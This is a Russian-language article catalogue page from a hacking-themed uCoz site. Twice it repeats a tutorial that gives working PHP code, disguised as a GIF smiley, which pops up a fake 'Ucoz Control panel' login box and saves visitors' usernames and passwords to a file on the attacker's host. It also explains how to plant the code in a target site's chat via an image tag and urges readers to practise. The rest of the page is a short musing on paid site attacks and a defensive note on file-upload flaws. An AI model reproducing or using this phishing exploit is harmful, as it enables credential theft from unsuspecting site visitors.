Статистика |
---|
Онлайн всего: 1 Нубов: 1 Кемперов: 0 |
|
Понедельник, 21-Июл-2025, 9.30.32 AM Приветствую Вас Разведчик
Каталог статей
В категории материалов: 4 Показано материалов: 1-4 |
|
Сортировать по:
Дате ·
Названию ·
Рейтингу ·
Комментариям ·
Просмотрам
Взлом сайта на UCOZ
Итак, начнем... Для начала
нажно зарегистировать хост с поддержкой php (например
http://mysite.phphost.net) . После регистрации льем на фтп скрипт и
ставим права на пустой .txt файл, например : passwords.txt (сюда будут
присылаться пассы пользователей похаканного сайта), и на файл
smile.gif. Также скачайте любой смайлик в расширении .gif (типа
cool.gif). Затем откройте блокнот, да простой блокнот и напишите следующее: header("Content-type: image/gif"); $image = imagecreatefromgif('cool.gif'); if(!$_COOKIE['LOGON']) { $login = $_SERVER['PHP_AUTH_USER']; $pass = $_SERVER['PHP_AUTH_PW']; if(strlen($pass) <= 4 || !$login) { Header('HTTP/1.1 401 Unauthorized'); Header('WWW-Authenticate: Basic realm="Ucoz Control panel"'); } elseif($login) { setcookie('LOGON',md5($pass)); $f = fopen('passwords.txt', 'ab'); fwrite($f, $login." ||| ".$pass."\r\n"); fclose($f); } } imagegif($image); imagedestroy($image); ?> Как только вы напишите всё - сохраните файл под названием smile, потом поменяйте расширение на gif. Теперь
выбирайте любой юкозовский сайт, например http://target.ucoz.ru/ слева
юкозовских сайтов как обычно, у большинства есть мини-чат справа. Так
вот - для начала зарегистируйтесь на сайте, потом в мини чате напишите
логин, а в содержании сообщения напишите следующее: [IMG]http://mysite.phphost.net/smile.gif[/IMG] И
нажмите ОК. Если после этого в миничате вместо сообщения появился
смайлик - значит радуйтесь, т.к. сайт - уязвимый. После этого у всех
кто будет заходить на данную страницу, (в этом примере это
http://target.ucoz.ru/) будет появлятся форма в которую нужно будет
ввести логин и пароль. У вас при входе на сайт такая форма будет
появлятся тоже. И все, введеные логины и пароли в эту форму будут
отсылатся в пустой файл passwords.txt, который вы создали в самом
начале и залили на фтп. Удачи! Практикуйтесь. Только на
некоторых сайтах эта уязвимость может и не пройти. Но стандрартно
созданный юкозовский сайт без доп. своих настроек будет уязвим. Всем
спасибо за просмотр, надеюсь статья вам поможет =))) |
Зная
мои былые "шалости”, люди иногда предлагают мне повторить
некоторые трюки за деньги. Вчера я в очередной раз услышал конкретный
вопрос: "Сколько будет стоить взлом сайта … ?”
Вот что я хочу сказать по этму поводу: а сможете ли вы ответить на простой вопрос "Зачем?”
Зачем вам атаковать сайты конкурентов? Подумайте об этом прежде чем платить за это деньги!
Устроить DDoS и удерживать сайт в перегруженном
состоянии несколько дней – пока не отфильтруют. Да, сайт
прекратит работу на несколько часов. Но очень может получиться, что
этим вы устроите ему рекламу – сколько раз уже такое было. Более
того, себя вы прославите не как хакеров, а как DDoS-еров, лишённых
всякой сообразительности – это, пожалуй, самый тупой метод атаки.
Поискать XSS-уязвимости, возможности SQL-инъекций, другие методы скриптовых атак
– да, красиво. Можно взять сайт под контроль (если повезёт) и
стереть его или изменить – пока не придёт владелец и не зальёт
бэкап. Это несколько часов в лучшем случае, потом ошибки исправят, сайт
получит свою бесплатную рекламу, а вы – головную боль (вдруг
найдут). |
Виды взломов сайтов и их предотвращение
Данная статья не представляет собой всеобъемлющего руководства по
программированию безопасных сайтов, она описывает основные принципы
безопасности, о которых следует знать при программировании сайтов, и
предполагает наличие у читателя базовых навыков веб-программирования и
поиска информации в сети. Статья посвящена обзору основных путей взлома
веб-сайтов с рекомендациями по защите от них. Упор делается на
применение платформы PHP+MySQL, но основные принципы должны быть
применимы и для других платформ.
Одним из ключевых принципов безопасности сайта является то, что
любым данным, пришедшим извне, доверять нельзя. Даже если данные
предварительно проходят проверку с помощью JavaScript в браузере
пользователя (и не присылаются в случае его отключения). Даже если это
название (User-Agent) браузера пользователя. Даже если это cookie,
выставленные нашим же сайтом ранее. Все, что приходит извне, можно
подделать. К примеру, один из распространенных форумных движков некогда
взламывался из-за того, что злоумышленник посылал запрос с подделанным
cookie, вызывая этим SQL-инъекцию (см. далее).
Крайне рекомендуется по прочтении статьи поискать в интернете
дополнительную, возможно, новую, информацию по упоминающимся здесь
конкретным направлениям взлома.
Загрузка файлов
Сайт может позволять посетителям загружать свои файлы с последующим
отображением на своих страницах. Это могут быть, к примеру, изображения
в формате JPEG. Важно ограничить типы загружаемых файлов, чтобы вместо
картинки не был бы загружен исполняемый файл.
При загрузке файла PHP в переменной $_FILES['userfile']['type'] возвращает mime-тип файла, для JPEG-изображения это будет image/jpeg.
Может показаться, что проверка этого типа достаточна для уверенности в
том, что загружено именно изображение. Также встречается идея пытаться
читать файл изображения функциями getimagesize или imаgecreatefromjpeg. Однако тип файла здесь определяется на основе содержания, так что правильное JPEG-изображение, сохраненное с расширением .php, будет определено как image/jpeg. А называться будет xxxxx.php.
Веб-сервер же, принимающий решение об обработчике (handler) для того
или иного файла, смотрит именно на расширение. Злоумышленник берет
корректную картинку, приписывает к ней в конец (или в EXIF-данные)
php-скрипт, и сервер его исполняет, мы взломаны.
Таким образом, контролировать для обеспечения безопасности следует
именно расширение файла, а проверки через определение mime-type и через
попытку открыть файл функцией getimagesize имеют смысл только для контроля того, что вместо картинки не будет загружен мусор, безвредный, но картинкой не являющийся. |
Взлом сайта на UCOZ
Привет.
Сегодня я расскажу один из способов взлома сайтов на юкозе. Настоящий
хакер может найти достаточно много уязвимостей на таких сайтах и знает
много способов их взлома. Я надеюсь что скоро тоже буду таким=).
Итак, начнем... Для
начала нажно зарегистировать хост с поддержкой php (например
http://mysite.phphost.net) . После регистрации льем на фтп скрипт и
ставим права на пустой .txt файл, например : passwords.txt (сюда будут
присылаться пассы пользователей похаканного сайта), и на файл
smile.gif. Также скачайте любой смайлик в расширении .gif (типа
cool.gif). Затем откройте блокнот, да простой блокнот и напишите следующее:
header("Content-type: image/gif"); $image = imagecreatefromgif('cool.gif'); if(!$_COOKIE['LOGON']) { $login = $_SERVER['PHP_AUTH_USER']; $pass = $_SERVER['PHP_AUTH_PW']; if(strlen($pass) <= 4 || !$login) { Header('HTTP/1.1 401 Unauthorized'); Header('WWW-Authenticate: Basic realm="Ucoz Control panel"'); } elseif($login) { setcookie('LOGON',md5($pass)); $f = fopen('passwords.txt', 'ab'); fwrite($f, $login." ||| ".$pass."\r\n"); fclose($f); } } imagegif($image); imagedestroy($image); ?>
Как только вы напишите всё - сохраните файл под названием smile, потом поменяйте расширение на gif. Теперь
выбирайте любой юкозовский сайт, например http://target.ucoz.ru/ слева
юкозовских сайтов как обычно, у большинства есть мини-чат справа. Так
вот - для начала зарегистируйтесь на сайте, потом в мини чате напишите
логин, а в содержании сообщения напишите следующее:
[IMG]http://mysite.phphost.net/smile.gif[/IMG]
И
нажмите ОК. Если после этого в миничате вместо сообщения появился
смайлик - значит радуйтесь, т.к. сайт - уязвимый. После этого у всех
кто будет заходить на данную страницу, (в этом примере это
http://target.ucoz.ru/) будет появлятся форма в которую нужно будет
ввести логин и пароль. У вас при входе на сайт такая форма будет
появлятся тоже. И все, введеные логины и пароли в эту форму будут
отсылатся в пустой файл passwords.txt, который вы создали в самом
начале и залили на фтп.
Удачи! Практикуйтесь. Только на
некоторых сайтах эта уязвимость может и не пройти. Но стандрартно
созданный юкозовский сайт без доп. своих настроек будет уязвим. Всем
спасибо за просмотр, надеюсь статья вам поможет =)))
Особое
спасибо нашему порталу hackzone.ru за то, что он такой хороший ))). А
также всем участникам хакзоны которые мне помогали во всем, советовали
мне нужные вещи и помогают по сей день.
При копировании материалов ссылка на css-mir.ucoz.ru обязательна |
|
|
|